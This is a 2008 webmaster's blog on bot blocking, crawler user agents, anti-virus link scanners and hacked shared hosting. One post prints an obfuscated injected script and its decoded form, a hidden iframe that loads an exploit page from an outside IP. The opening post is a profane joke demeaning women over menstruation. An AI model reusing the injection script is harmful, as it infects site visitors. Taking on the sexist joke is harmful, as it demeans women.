Sunday, August 24, 2008

Woman Weather Channel

During a discussion with a few of my male friends today it became obvious that some of us could benefit from such an online service.

You could have a widget, perhaps a Google Gadget even, sitting on your desktop that declares your woman's current menstrual state such as:

Today: Slightly Spotty
Then you could click on the widget and look at the 5 day forecast and see what's in store for the week:
Mon: Spotty
Tue: Heavy Flow
Wed: Flow
Thu: Spotty
Fri: Clear
Obviously the paid version I'm tentatively calling "Wife Alert" could also send potentially life saving text messages to your cell phone at appropriate times.

It's 6am on that fateful morning when the text message alarm chirps:
"PMS EMERGENCY! THIS IS A HEAVY FLOW DAY! FORGET THE CHILDREN, GET OUT NOW AND SAVE YOURSELF BEFORE IT'S TOO LATE!"
Perhaps even an advance warning system with even more important information such as converging events that could spell disaster if you fuck up.
"WARNING - HEAVY FLOW AND BIRTHDAY BOTH COMING IN 3 DAYS. DON'T FORGET FLOWERS, PRESENTS AND PARTY AS YOUR LIFE COULD DEPEND ON IT!"
Considering how much physical and mental abuse this could potentially save men, it's even possible your health insurance company would pick up the tab to "Wife Alert" as a standard health benefit.

Just like how the weather channel allows you to look up the weather of other locations around the world, the Woman Weather Channel would allow you to look up celebrities online.

Could you imagine tuning in to watch The View when you knew two of the hosts were going to have a bad day at the same time?

The Woman Weather Channel could also be an indispensable resource for anyone in business or politics that could simply avoid any bosses, colleagues or co-workers known to be having a "bad day" until her weather report showed all clear.

The possibilities are endless so tune into the Woman Weather Channel today and all you husbands subscribe to "Wife Alert" as it could be your life it saves!

Thursday, August 14, 2008

How Flawed is Your Anti-Virus?

Some of the anti-virus web surfing protection products are permitting some very risky behavior due to flaws in their basic design. For instance, some of them allow your browser to willingly go to known bad locations they have in their database until something catastrophic gets downloaded. Once the file is downloaded it might be too late so there's the real problem.

Here's a quick for instance, the site "gcounter.cn" was found in an Invisible IFrame launcher yet the page with that code was deemed safe. However, when you go to gcounter.cn, which you should NOT go to as it's very bad, downloads a wide variety of things or randomly redirects you to Google of all places. That redirect to Google is probably tossed in there to throw people off the path trying to figure out if this is the source of the virus, but that's another story.

Anyway, several anti-virus and link scanning products just ignored the fact that this site is known to be bad and let me visit these pages without so much as a warning. Better yet, when I fed some infected pages directly into my browser just to see what happened, they couldn't detect the Invisible IFrame launcher script properly, and even when they did, didn't stop me from running the page at that time or even pop a warning!

Why?

Because gcounter.cn, like many other malware sites, wasn't downloading a bad file at that particular instance. However, a few minutes later the malicious files were flowing from gcounter.cn again and then the anti-virus woke up, finally.

Shouldn't the fact that gcounter.cn downloads any malware be enough of a reason to set off some alarms and stop people dead in their tracks from going there?

Apparently not.

It appears that hackers have a leg up on spoofing the malware scanning software and the anti-virus developers so it's no wonder that machines are getting hacked all over the place.

Although the anti-virus products do add some value to protecting surfers they unfortunately cause more harm than good by giving a false sense of security. With the massive gaping holes in their technology the only try way to surf safe is using NoScript since no javascript whatsoever means no Invisible Iframe launcher tricks.

I'm not going to name which anti-virus products I tested at this time because I'd like to give them time to fix their products before exposing their shoddy methodologies and putting their customers at risk being more of a target than they already are.

Come on anti-virus writers, get your shit together before I lose my shit and do a real expose!

Addendum:

The one interesting twist in the Invisible Iframe launcher script that I found this time is that it was injected into a common javascript file shared site wide instead of just being inserted into the home page. This is a nasty strategy twist that gives the hackers a bigger bang for their buck by getting more infected pages with a lot less work and the code isn't in the HTML file which is where most people would look first.

Thursday, July 24, 2008

SEO Community in TailSphinn

I tried to support Sphinn's efforts by putting the SphinnIt button on my site to help raise awareness of what they were trying to do with something unique for the SEO community.

Unfortunately, Sphinn devolved into a bunch of Sphamm and when one of their members pointed out how widespread the problem was they banned Edward. OK, Edward (pageoneresults) can push the envelope a little but it wasn't out of disrespect, he was making a very public spectacle to get them off their dead asses to fix the problem.

So EvilGreenMonkey of Sphinn even admitted Edward was right:

The person highlighted in Aaron's post has had their account terminated, there is no need to interact with them further. The findings highlighted in his comments were not new or truely condemning. Yes, people spam Sphinn - we remove the spam. Yes, submit.php URLs were getting indexed - although from Google indexing WP social media plugin links rather than spamming. Fixes to these problems were either already implemented or scheduled for release before said user started his campaign. I'll make no further comment on this post and suggest that we leave it at that.
So instead of saying "Thank you for bringing it to our attention" and "We're working on the problem" with a proposed implementation date, they just ban him and that's when all hell broke loose in the SEO blogosphere.

No only that, shouldn't the Sphinn members get an apology from Sphinn for forcing us to suffer through all that Sphamm which one simple NOFOLLOW would've stopped from the beginning?

Perhaps Sphinn bears some of the blame here because if "his comments were not new or truely condemning" then you allowed the situation to continue unabated until one of your members simply couldn't take it anymore.

So Sphinn members had to put up with Sphamm for a year and not even a simple apology but they shot the messenger that finally snapped, good going Sphinn.

Right on the heels of this they decide to take a swipe at Kimberly Bock and threatened to ban her for some hypocritical horseshit.
1. Your flame post submitted by another user, which went Hot on Sphinn, was removed due to 26 Desphinns and many complaints.
2. The posts about your personal life had no internet marketing relevance and are seen as off-topic/spam.
So let's review Kimberly's plight as she was a) threatened over a post that someone else submitted to Sphinn and b) claiming that 2 SEOs getting married isn't news.

Holy mother of horseshit, have they lost their minds?

I find their current heavy handed reputation management tactics too autocratic to support Sphinn anymore simply because the good of the community isn't being served when criticism is swept under the rug and attempted to be squelched instead of addressed.

The Sphinn button is off my site because I certainly wouldn't want to be associated with all the vapid top 10 lists being submitted and I sure as hell don't want someone yelling at me about material on my site not being suitable in the event someone else Sphinn's it, such as happened to Kimberly.

Maybe someday if Sphinn gets their act together and stops shooting the messengers and they improve the quality of their content, the SphinnIt button will return.

Until that day, SphuckIt!

Sunday, July 06, 2008

iPowerWeb Hacking Continues

Over a year ago I wrote about a bunch of iPowerWeb's shared servers being hacked, and it looked like they were trying to clean it up, but now it's time for round two of hacking.

The latest batch of hacked sites may have a DNS hack as well, I'm not sure that's the case but Alex seems to think it is.

All these sites have the following Whois Name Server entries:

Name Server: NS1.IPOWERDNS.COM
Name Server: NS1.IPOWERWEB.NET
Sure looks like iPowerWeb, right?

But the reverse DNS all goes to IPs on *.static.eigbox.net which links to BIZLAND

Here's a sample of the javascript in this round of site hacking:
eval(unescape("%77%69%6e%64%6f%77%2e%73%74...."));
Don't go to the link below if you know what's good for you, it's not safe.

The javascript above, when decoded, is the following:
window.status='Done';document.write('<iframe name=f2f8f656791 src=\'http:// 58.65.232.*/gpack/index.php?'+Math.round(Math.random()*74880)+'2\' width=480 height=156 style=\'display: none\'></iframe>')
You guessed it, bad things happen at 58.65.232.33 which APNIC claims to be hostfresh.com out of Honk Kong which has a San Francisco mailbox according to their website.

Can someone explain why this exploit site still exists if these guys are doing business with a US address and all hell isn't raining down on their parade?

I don't get it, the web has gone mad...

Tuesday, June 17, 2008

AVG 8 LinkScanner Fiasco Recap

For those of you that might've missed the whole AVG 8 LinkScanner disaster and ensuing AVG reputation nightmare, here's a quick recap and links to places to read all the details.

Webmasters started noticing a rash of distributed IP's with the same user agent, no referrer, and a few other technical issues I won't go into now, that suddenly started pounding their sites:

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)
At first I thought it looked like a botnet scraper but soon someone figured out it was related to the new release of AVG 8 that included a LinkScanner that was amusingly called "Safe Search" which is now not-so-safe since everyone knows how to spoof it.

The story was first broken on WebmasterWorld, then again on The Register, then a follow up on WebmasterWorld and a few other places. The best part of the story on The Register actually unfolds in the comments section which is now over 200 posts but has some good comments if you're willing to wade through it all.

It appears this Safe Search link scanning was a knee jerk reaction to McAfee's SiteAdvisor. SiteAdvisor uses stale search results to flag sites with known exploits. However, Safe Search, much to everyone's dismay, hits all sites in real-time to check for exploits for every single search. The most amusing aspect is that the very AVG feature which is supposed to make the internet safer has been attacking sites and become malware itself.

Here's a list of all the major points so far:

1. AVG 8 appears to be causing an escalating DDoS attack as more and more AVG users upgrade causing some sites to be hit by many thousands of unique IPs per day.

2. AVG's Safe Search is causing webmaster analytics worldwide to be totally skewed unless you filter out the ";1813" user agent.

3. AVG 8 is exposing their customer information to sites their customer didn't even visit and potentially setting them all up for some future exploit. They'll be targets for direct marketing to switch to a new AV product at a minimum with savvy affiliates making out like bandits.

4. The Safe Search link scanner has the potential to automatically access sites that aren't allowed at work, could violate your ISP's AUP or be illegal in some jurisdictions. This could result in reprimand, losing your ISP or potentially being flagged in honeypot sites for illicit activities.

5. The malicious sites can already fake the Safe Search code which appears to put users of the free AVG 8 at risk. The risk is because you only get Safe Search, the link scanner which is being spoofed, but you don't get Safe Surf, which stops HTML exploits as you load the page. It appears you need a paid version of AVG 8 to actually be protected from online exploits so be careful where you surf using the free version of AVG 8.


Well, that's the recap in a nutshell.

This just goes to show you how the best intentions can have disastrous results when people don't think about the consequences of their actions, especially when dealing with an installed base of this scale.

Thursday, May 22, 2008

Did CSC's Spybot Get Caught?

Looks like yet another corporate compliance spybot is hitting our servers, not like we need yet another spybot.

There's only one IP out of this entire range that consistently hits my servers.

OrgName: Corporation Service Company
OrgID: CORPO-9-Z
NetRange: 165.160.0.0 - 165.160.255.255

They claim to crawl the web:

Our proprietary technology scans and digests web pages, images and other Internet content around the clock to locate critical occurrences of online brand abuse.
Yet again, nobody has ever seen a crawler name in use so I'll hazard a guess it doesn't read or respect robots.txt when it's crawling, or possibly trespassing, on our servers.

I'd post more about the specifics on this one but I really don't want them to wise up too much because some of the things their crawler does, while pretending to be a browser, trips several alarms in my bot blocker.

Kind of hard to digest web pages when you're busy digesting error pages instead!

Just another day of the internet version of Spy vs Spy.

Monday, May 12, 2008

Impact On Your Bandwidth Will Be Minimal My Ass

How often do we see that happy line of horse shit spread by every new startup that crawls the web about how minimal it's impact will be?

Every fucking one of them claim it but when you add them all together the bot traffic is quickly exceeding the human traffic.

Who the fuck am I kidding, on most sites the bots clearly out number the humans in pages read on a daily basis.

First we put the big search engines on top of the heap with Google, Yahoo and MSN crawling the crap out of your servers daily. Just the three of these guys can easily read as many pages as 10K visitors a day. Then throw in the wannabe search engines like Ask, Gigablast, Snap, Fast, etc. ad nauseam and it's over the top.

Now expand that list to include the international search engines like Baidu, Sogou, Orange's ViolaBot, Majestic12, Yodao, and on and on, tons of 'em.

Then we have all the spybots that feel entitled to crawl your site like Picscout, Cyveillance, Monitor110, Picmole, RTGI, and on and on.

Next add up all the specialty niche bots like Become, Pronto, OptionCarriere, ShopWiki, and all sorts of shit too numerous to mention.

Pile on top of this all the free fucking tools that every little shithead and make believe company uses to scrounge the 'net for god knows what, and god's not telling, like Nutch and Heritrix, plus the web downloaders, offline readers, and more.

Don't forget, many of these so-called search engines and shit now want screen shots as well so after they crawl your page they send a copy of Firefox or something to your site to download every page again plus every fucking image, never cached, over and over and over.

Did I forget to mention directories?

They'll want to link check you and get screen shots as well, don't leave them out or they'll feel fucking neglected.

Wait, there's more, those social sites like Eurekster, Jeteye, etc. that let people link to your shit and then come back banging on your site all the time to make sure that shit's still valid.

Then add up all the RSS feed readers and aggregators that pull down your RSS feeds that nobody ever fucking reads. Not to mention the RSS feed finders like IEAutodiscovery that run amok on your site just looking for RSS feeds ... FUCK!

If you run affiliate programs you have CJ quality bot or some shit hitting your site and if you run ads then the Google quality bot, it's always something.

Don't forget the assholes running the dark underbelly of the web with all the scrapers, spam harvesters, forum, blog and wiki spammers, botnets and other malicious shit pounding on our sites daily.

Add on top of all this shit Firefox, Google Web Accelerator and now AVG's toolbar all pre-fetching pages that will most likely never be read and holy shit, we're being swamped!

OK, now that we've identified all this bot traffic, where's all the fucking people?

Of course you think all those hits from MSIE and Firefox are people, right?

Hell no!

Are you out of your fucking mind?

Those hits are the scrapers, screen shot makers and companies like Cyveillance and Picscout that don't want you to stop them from crawling your site so they just pretend to be humans to get past the bot blockers.

Well guess what?

There are no fucking people on your site. the internet is now run for and used exclusively by bots.

Apparently you missed the memo.

Comparing Effectiveness of Anti-Virus Web Protection Methods

There's three basic methods being used at the moment to protect web surfers from potential dangers which are static (stale), active and passive.

Static Web Protection

Various companies use the static method which relies on crawling the web in advance to find vulnerabilities and then attempt to warn visitors about these problems as they are about to visit a web site. McAfee's SiteAdvisor and Google both take this approach and it's obviously only as good as your last scan and the malware can easily be cloaked and hidden from these somewhat obvious crawlers. Besides easily being fooled with cloaking, the data is always stale meaning sites good even 10 minutes ago could now be infested with malware and sites previously infested could have been cleaned.

This method isn't optimum for anyone and can be a nightmare for websites tagged as bad to get off the warning list assuming they ever find out they're on it in the first place as their business goes down in flames from traffic going elsewhere.

Active Web Protection

The latest AVG 8 includes a Link Scanner and AVG Search-Shield which aggressively checks pages in Google search results that you're about to visit in real time to help protect the surfer. Unfortunately, AVG made several mistakes, some that could be deemed fatal flaws, which allows this technology to be easily identified so that malware and phishing sites can easily cloak to avoid AVG's detection. Even worse for webmasters is that AVG pre-fetches pages in search results and as adoption of this latest AVG toolbar increases, it is quickly turning into a potential DoS attack on popular sites that show up at the top of Google's most popular searches.

While I think AVG's intentions were good, their current implementation easily identifies every customer using their product and causes webmasters needless bandwidth issues that could be easily resolved on their part with a cache server.

Passive Web Protection

The method used by Avast's Anti-Virus is to use a transparent HTTP proxy meaning that all of your HTTP requests pass through in invisible intermediate proxy service that scans for potential problems in the data stream in real-time. The data is always fresh, checked in real-time, the user agent doesn't change and there are no pre-fetches or needless redundant hits on websites.

The only downside is you don't know the site is bad in advance but that can easily be the case with static protection due to stale data and/or cloaking and active protection due to cloaking.


The Best of All


While the three approaches all have their potential problems it appears a combination of all three is probably the best approach.

Bad Site Database:
The SiteAdvisor/Google type database approach is good to log all known bad sites so they don't get a second chance to fool the other methods with cloaking once their are caught. This cuts down on redundantly checking known bad sites until the webmaster cleans it up and requests a review to clear their site's bad name.

Perhaps the Bad Site database concept needs to become a non-profit dot org so that all of the anti-virus companies can freely feed and use this database without all the corporate walls built up around the ownership of the data for the greater good, something like a SpamHaus type of thing or perhaps merged into SpamHaus.

Optimized Pre-Screening:
The AVG approach of pre-screening a site could be optimized by fixing the toolbar's user agent so it's not detectable and use a shared cache server to avoid behaving like a DoS attack on popular websites. The beauty is that the collective mind of all these toolbars with an undetectable user agent avoids the cloaking used to thwart detection associated with known crawlers. If the toolbar fed the results of these bad sites to the Bad Site Database, then there's a win-win for everyone.

Transparent Screening:
The final approach used by Avast should still be performed which is the HTTP proxy screening to that any site that manages to not be in the bad site database and still eludes the active pre-screening of pages, would hopefully get snared as the page loads into the machine.

Summary

When you pile up all of this security the chances of failure still exist but the end user is protected and informed as much as humanly possible from all of the threats present.

It would certainly be nice to see some of the anti-virus providers combine their efforts as outlined above to make the internet a safer place to visit.

Sunday, April 27, 2008

Off By More Than One

Can you believe that someone is actually surfing the web using some free browser called Off By One that doesn't appear to have been updated in the last 2 years?

The user agent is as follows:

"Mozilla/6.0(compatible;OffByOne;Windows 2000)"
The irregular formatting convention triggered the bot trap with the lack of spaces alone.

Then it claims to be Mozilla 6.0 when it's probably Mozilla 3.0 at best.

Considering how few times, if ever, that this browser has visited it's obviously very rare.

Maybe some online nerd activist will get it declared as an endangered online species so it will become protected by law.

Don't laugh, you know it'll happen eventually...

Sunday, April 20, 2008

Reciprocal Link Exchange? Let's Swap!

For years I've been deleting all those emails asking me to exchange links and I won't swap links with any of that crap.

Suddenly I've had an epiphany and YES!, now I'll swap links with you, no problem!

I'm only agreeing to swap links as requested.

I'm not using NOFOLLOW on those links as requested.

You can see my links when you visit, online and visible as agreed.

Unfortunately my link swapping page will never be seen by Google, Yahoo, MSN or any other search engine but you'll see it just fine.

I'm going to hold up my end of the bargain, we swapped links, how about you?

Kaushik, What Freaking Experiments?

I found this user agent coming out of Microsoft's Area 131 requesting that people "contact kaushik for these experiments" that kept hitting one of my servers.

131.107.0.96 "contact kaushik for these experiments"
So I did a little data mining of my own and searched Microsoft and couldn't decide if this experiment was from Kaushik #1 or Kaushik #2.

Both Kaushik's appear to be working for the Data Management, Exploration and Mining Group (DMX) at Microsoft, but which one ran this experiment?

OK, will the real Kaushik running these experiments please stand up?

BTW, was your experiment finding sites running bot blockers?

If so, you succeeded and your requests were stopped. ;)

DNS Right But User Agent Wrong

Ran into a user agent from DNSRight today that claimed to be some link check tool that doesn't appear on their site.

66.240.236.220 "GET / "
"http://www.dnsright.com/" "DNSRight.com WebBot Link Ckeck Tool. Report abuse to: dnsr@dnsright.com"
So I ran some of their other tools that don't identify themselves at all.
66.240.236.220 "GET / HTTP/1.1" "-" "-"
They host this mess at cari.net so just block 'em.
OrgName: California Regional Intranet, Inc.
NetRange: 66.240.192.0 - 66.240.255.255
CIDR: 66.240.192.0/18
No more DNS Right or Left, it's now DNS Gone.

Thursday, April 17, 2008

Picmole, Yet Another Spybot!

There must be good money spying on everyone because it seems a new company springs up almost weekly trying to claim their stake in this new gold rush.

How many fucking spybots do we need?

Today on the spybot circuit the we're serving up a helping of Picmole that's using heritrix to do it's crawling. Surprisingly it still checks robots.txt but who knows if they'll honor it down the road because honoring robots.txt conflicts with accomplishing their stated goals.

Identifying their spider properly and crawling from easily identifiable IPs will also present them problems as their activities increase but being a new service they'll soon figure that out and probably go stealth like all the rest.

208.109.189.127 [ip-208-109-189-127.ip.secureserver.net.] requested 1 pages as "Mozilla/5.0 (compatible; heritrix/1.12.0 +http://www.picmole.com)"
Sorry, but your bot hit a firewall on your first attempt.

Abort, Retry, Ignore?

Favcollector Bandwidth Waster

Here's another product of Canada doing the stupidest shit ever seen, collecting favicons.

It came and grabbed my icon, then hit the home page which the bot blocker promptly stopped, so who the knows what else it would've done beyond that.

66.207.217.138 [gaspra.crazylogic.net.] "Favcollector/2.0 (info@favcollector.com http://www.favcollector.com/)"
From their FAQ:
Favcollector is a spider that searches the internet for favicons. It downloads and stores these favicons for each site it visits. It will go back once a month to see if the favicon has changed and will download the new icon if it is has, effictivly creating an archive of all favicons on the internet.
Spider?

Spider my ass...

Spiders ask for robots.txt files, read them, and go away.

Not this piece of shit as it just comes and it takes what it wants without regard to the webmasters wishes.

Not only that, a bunch of trademarked icons are now on their site without permission which will most likely make some crazed trademark enforcers start jumping up and down once they find that site.

BTW, run a damn spell checker on your site as the word is effectively, not "effictivly" unless that's the Canadian spelling.

Canasasearchbot For Canasians, Oh Canasa!

It's hard to resist commenting on a bot that can't even spell it's own name or it's country name correctly.

206.248.137.34 [mycanadasearch.ca.] "canasasearchbot(http://www.mycanadasearch.ca/robots.html)"
However they got it right on their robots page:
User-agent: canadasearchbot
It did ask for robots.txt but who knows if it was looking for "canasasearchbot" or "canadasearchbot", total crap shoot.

I tried their little search engine and it took it a really long time to come back with some really bad results.

Here's a "search tip", try searching your log file and examine what your crawler is putting in that log file before turning it loose on the world.

Nothing like that fine Canadian quality, eh?


Monday, April 14, 2008

Mozshot Tries Taking a Screenshot

Yet another Firefox-based screen shot tool hit my other site today just in time to take a screen shot of an error message telling them they weren't allowed to take screen shots without permission.

Details:

61.206.125.245 [tempest.nemui.org.]
"Mozilla/5.0 (Gecko/20070310 Mozshot/0.0.20070628; http://mozshot.nemui.org/)"
This thing appears to be open source, oh joy...

Friday, April 11, 2008

RTGI - The French Social Media Spybot

Yet another social media mining operation designed to track every bit of intel said about brands, people, politics and more.

From a translation of their site:

Our solutions simplify the identification of influential communities and monitoring of their conversations, to the benefit of businesses, communication agencies or research institutes.

RTGI's approach allows the analysis of the links and content generated by the citizens, journalists, consumers or activists, to draw the contours of communities conversations around your issues, brands and products and their real impact on your image online. RTGI have elaborated the linkfluence to give a unit of reliable measurement of the influence of the social web sites.
The highlighting was added to help you see how it facilitates spying on your ass without going to much effort to do so.

Heck, the French government is in their list of clients!
  • Information Service (GIS) government
  • Ministry of the Economy, Finance and Employment Ministry of the Economy, Finance and Employment
  • Picardy Regional Council (RENUPI)
Sheesh, didn't need to translate as they have an English .EU version too.

Oh well, I'm not rewriting it!

Continuing on...

George Orwell obviously didn't anticipate the internet and he was off by a few years, 24 to be exact, but his overall message of Big Brother watching us in 1984 is finally coming true in 2008.

Anyway, back to the details:
"mozilla/5.0 (compatible; RTGI; http://rtgi.fr/)"
The IP's they operate from are:
88.191.50.170 -> sd-8985.dedibox.fr.
91.121.108.180 -> t800.rtgi.eu.
91.121.25.182 -> merlin.rtgi.eu.
91.121.25.184 -> r2d2.rtgi.eu.
91.121.79.160 -> c3po.rtgi.eu.
The old address of 88.191.50.170 doesn't appear to be active since 04/13/2007 so I probably wouldn't worry about that too much unless you just want to block that dedicated hosting range for good measures.
inetnum: 88.191.3.0 - 88.191.248.255
netname: FR-DEDIBOX
descr: Dedibox SAS
descr: Paris, France
route: 88.160.0.0/11
The dedicated host they currently use has this range of IPs:
inetnum: 91.121.0.0 - 91.121.31.255
netname: OVH
descr: OVH SAS
descr: Dedicated Servers
descr: http://www.ovh.com
So there you go, another way to make your site part of the anti-social media by keeping the snoops out.


Project Rialto's PRCrawler Is Data Mining?

Since I whitelist allowed bots I've had Project Rialto blocked since the beginning but I was curious what they were doing since they first showed up on my radar on 01/23/2008 and kept coming back over and over.

From one of their job ads:

We are designing high-performance algorithms and developing reliable, fault-tolerant and scalable real-time systems that can handle massive volume of data for in-depth analysis of user behavior to enable targeted advertising.

and...

Research and investigate academic and industrial data mining, machine learning and modeling techniques to apply to our specific business case
Oh boy!

It appears they want to crawl our sites and use that information to shove more ads in our face.

Somehow, I don't think so...

If you're going to mine data, shouldn't you get the URLs right?

The site they're attempting to "mine" is on a Linux box and URLs are case sensitive and my URLs all have upper/lower case in them yet the PRCrawler only asks for those URLs in all lower case so even if I left them crawl my site they'd get nothing but 404s.

No wonder their home page says they're a "stealth company" because I'd hide too if I couldn't even get the proper case of the URLs right.

Here's their user agent:
"PRCrawler/Nutch-0.9 (data mining development project; crawler@projectrialto.com)"
They operate from the following IPs:
64.47.51.153
64.47.51.158
67.202.0.157
67.202.0.17
67.202.0.71
67.202.10.65
67.202.18.229
67.202.29.20
67.202.3.112
67.202.3.141
67.202.3.151
67.202.56.219
67.202.58.214
67.202.59.117
67.202.62.162
67.202.62.45
72.44.36.20
72.44.36.8
72.44.37.72
72.44.39.55
The first two were from masergy.com, the rest are all from compute-1.amazonaws.com.
host-64-47-51-153.masergy.com.
host-64-47-51-158.masergy.com.
I haven't seen anything from masergy.com since the initial contact but that's only 2 months ago so who knows.

Don't know where they primed the pump for their data mining operation since they already had lots of information about my site when they attempted to crawl, but since it was all lower case it was completely useless.

I'm just curious if they got it my URLs from somewhere already in lower case or someone there slapped a tolower() around a line of code when importing the URLs into Nutch.

Don't know, don't care, it's amusing either way.

Good luck with Project Rialto, you're going to need it.

Wednesday, April 09, 2008

Radian6's R6_FeedFetcher Fetching More Than Feeds

For those of you unfamiliar with Radian6 it's a "social media monitoring tool" because apparently everyone with an opinion on the internet needs someone to spy on their ass since we're disruptive.

Well bummer.

Isn't it a shame the good old days are gone where companies told you everything you needed to know about their brand and you had to be a journalist just to get your opinion heard?

Of course those so-called journalists never gave you their real opinion because of fear of losing advertisers so it was all candy coated bullshit that just bordered on the truth because advertisers couldn't handle the truth fearing nobody would buy their shit.

Tough shit and god bless the great equalizer called the Internet that leveled the playing field between consumers and companies so we can find out what's really going on without everything being filtered through the company spin doctor.

Their crawler details are:

142.166.3.122 "R6_FeedFetcher(www.radian6.com/crawler)"
The amusing thing about the R6_FeedFetcher is I never see it fetching the feed, instead it's trying to fetch pages linked from the feed, which is what we call a crawler and not a fucking feed fetcher.

Does it read robots.txt to see if it's allowed beyond my RSS feed?

Fuck no.

I looked at all accesses on my RSS feed and didn't see anything obvious so maybe they get RSS feeds from FeedBurner or something similar, who knows.

Anyway, it's blocked now on my other site so I can be as disruptive as I want there.

However, who wants to place bets that this disruptive post will be monitored?


P.S. The site R6_FeedFetcher is blocked on is not this blog for first time readers ;)

Update:

After doing some research it appears they also have the following user agent:
R6_CommentReader(www.radian6.com/crawler
Also, read this interesting post about Radian6 on Simon's blog.

Friday, April 04, 2008

Discovery Engine's Discobot Discovered My Bot Blocker

I found this little Discobot from Discovery Engine trying to dance around on my server but the bot blocker bouncer at the door was already keeping him behind the velvet ropes.

Here's a sample of what I saw on my site:

208.96.54.74 "GET /robots.txt"
"Mozilla/5.0 (compatible; discobot/1.0; +http://discoveryengine.com/discobot.html)"

208.96.54.68
"Mozilla/5.0 (compatible; discobot/1.0; +http://discoveryengine.com/discobot.html)"
It does honor robots.txt just like they said it did but it cached it for about 48 hours between visits.

They were nice enough to provide the range of IPs it uses:
208.96.54.67 - 208.96.54.96
Those IPs are from Servepath which I already block.

Between whitelisting allowed bots and blocking more data centers then I'd care to admit, this poor little Discobot didn't stand a chance to discover anything.

Call back when you're all grown up and ready to send traffic.


Persaibot - The Rude Crawler

I saw this little Persaibot hit my site today without even looking at robots.txt and their website has the balls to say:

Persai uses this bot to crawl the web. It's probably the nicest bot with the greatest personality in the world. Seriously, give it some attention.
Exactly how nice can a bot be that doesn't read robots.txt?

Did you read it and cache it some other day?

Doesn't matter, that was more than 24 hours ago, read it again.

I checked my logs from yesterday, it didn't read it then either and Persai hadn't visited my site in about a month before that.

I'm sorry, you have made the huge faux pas in robot rudeness.

Here's the intel I have on this little bot:
71.204.131.68 [c-71-204-131-68.hsd1.ca.comcast.net]
"PersaiBot/2.1-dev3a (Persai web crawler; http://www.persai.com/bot.html; bot at persai dot com)"

67.202.55.205 [ec2-67-202-55-205.compute-1.amazonaws.com]
"Mozilla/5.0 (compatible; Persaibot/2.71828183; +http://www.persai.com/bot.html)"

76.102.193.127 [c-76-102-193-127.hsd1.ca.comcast.net]
"Mozilla/5.0 (compatible; Persaibot/2.71828183; +http://www.persai.com/bot.html)"
Now the true irony here is that the CEO of Persai posted on his blog complaining about another search engine called Spock scraping every little bit of data about him but at least Spock claims to honor robots.txt.

Must be a karma thing ;)

DART Agent - Another Annoying Distributed Tool

This little annoying DART thing that keeps bouncing off my web site appears to be written by CRS4, the Center for Advanced Studies, Research and Development in Sardinia.

It would appear DART stands for "Distributed Agent-based Retrieval Tools" and they even have a workshop in '06 about this damn thing touted as "The Future of Search Engines' Technologies" that had people from Yahoo!, Google, Quaero and Ask attending.

Here's a sample of some IPs it operates from and the shitload of versions this thing has:

212.123.91.18 "DART Agent, version 1.2 (build 14062007)"
212.123.91.78 "DART Agent, version 1.2.7 (build 27062007)"
212.123.91.78 "DART Agent, version 1.4 (build 17102007)"
156.148.18.62 "DART Agent, version 1.4 (build 29102007)"
156.148.18.62 "DART Agent, version 1.4.1 (build 05112007)"
156.148.18.62 "DART Agent, version 1.4.2 (build 08112007)"
212.123.91.78 "DART Agent, version 1.4.3 (build 15112007)"
212.123.91.78 "DART Agent, version 1.4.3 (build 19112007)"
212.123.91.78 "DART Agent, version 1.4.4 (build 05122007)"
212.123.91.78 "DART Agent, version 1.4.5 (build 06122007)"
212.123.91.78 "DART Agent, version 1.4.6 (build 14012008)"
156.148.18.62 "DART Agent, version 1.4.6 (build 14012008)"
212.123.91.78 "DART Agent, version 1.4.7 (build 24012008)"
212.123.91.78 "DART Agent, version 1.4.8 (build 04022008)"
212.123.91.78 "DART Agent, version 1.5 (build 08022008)"
212.123.91.78 "DART Agent, version 1.5.1 (build 14022008)"
212.123.91.78 "DART Agent, version 1.5.2 (build 18022008)"
212.123.91.78 "DART Agent, version 1.5.5 (build 27022008)"
156.148.18.62 "DART Agent, version 1.5.6 (build 28022008)"
212.123.91.78 "DART Agent, version 1.5.6 (build 28022008)"
212.123.91.78 "DART Agent, version 1.5.1 (build 14022008)"
212.123.91.78 "DART Agent, version 1.5.7 (build 05032008)"
82.85.70.40 "DART Agent, version 1.5.2 (build 18022008)"
212.123.91.78 "DART Agent, version 1.5.8 (build 06032008)"
156.148.18.62 "DART Agent, version 1.5.8 (build 06032008)"
82.85.70.42 "DART Agent, version 1.5.8 (build 06032008)"
212.123.91.78 "DART Agent, version 1.5.9 (build 19032008)"
212.123.91.78 "DART Agent, version 1.5.8 (build 06032008)"
212.123.91.78 "DART Agent, version 1.5.9 (build 20032008)"
213.205.44.51 "DART Agent, version 1.5.8 (build 06032008)"
213.205.44.52 "DART Agent, version 1.5.8 (build 06032008)"
212.123.91.78 "DART Agent, version 1.6 (build 02042008)"
213.205.44.52 "DART Agent, version 1.5.8 (build 06032008)"
156.148.18.62 "DART Agent, version 1.6.0 (build 02042008)"
Looks like so far it's only operating out of Italy and they're nice enough to provide reverse DNS when it operates off their servers "dartcn01.crs4.it" and even another source "dart02.itsm.tiscali.com" so the crawler could be verified but other sources couldn't be verified such as "82-85-70-40.b2b.tiscali.it" so it's going to be a problem child for anyone that wants to let it play but make sure it's not being spoofed.

Just what the web needs, more distributed web technology to bug the fuck out of webmasters just trying to scratch out a living on the internet.

Oh well, it can't play on my server so what the hell do I care anyway!


Saturday, March 29, 2008

WHO is Scraping My Site!

Note the lack of a question mark in the title because this wasn't a question about "WHO?" but an actual statement about "WHO!" and by that I mean the WHO as in an office of the World Health Organization.

It registered 411 page requests from 203.94.76.59 which is a non-portable address assigned to the WHO Representative Office in Sri Lanka.

Here's the IP and UA:

203.94.76.59
"Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
Here's the WHOIS:
inetnum: 203.94.76.56 - 203.94.76.63
netname: WHO-SLT-LK
country: LK
descr: WHO Representative Office
descr: 385, Health Inform. Centre, Suwasiripaya, Deens Road, Colombo-10
admin-c: NS198-AP
tech-c: NS198-AP
status: ASSIGNED NON-PORTABLE
mnt-by: MNT-SLT-LK
source: APNIC

person: Network Administrator SLTNet
nic-hdl: NS198-AP
address: Sri Lanka
country: LK
mnt-by: MNT-SLT-LK
source: APNIC
It pretended to be a human browser like so many of them do these days by pulling all the images from the index page and then it took off ripping pages like a bandit.

It wasn't even a smart bot as the first link it hit off the index page was my bot trap which is easily flagged and avoidable in the robots.txt as a no crawl zone, so it definitely wasn't human.

Of course the robots.txt file is my other bot trap but what the hell.

Then it went screaming along asking for the next 409 pages at 2-3 pages a second.

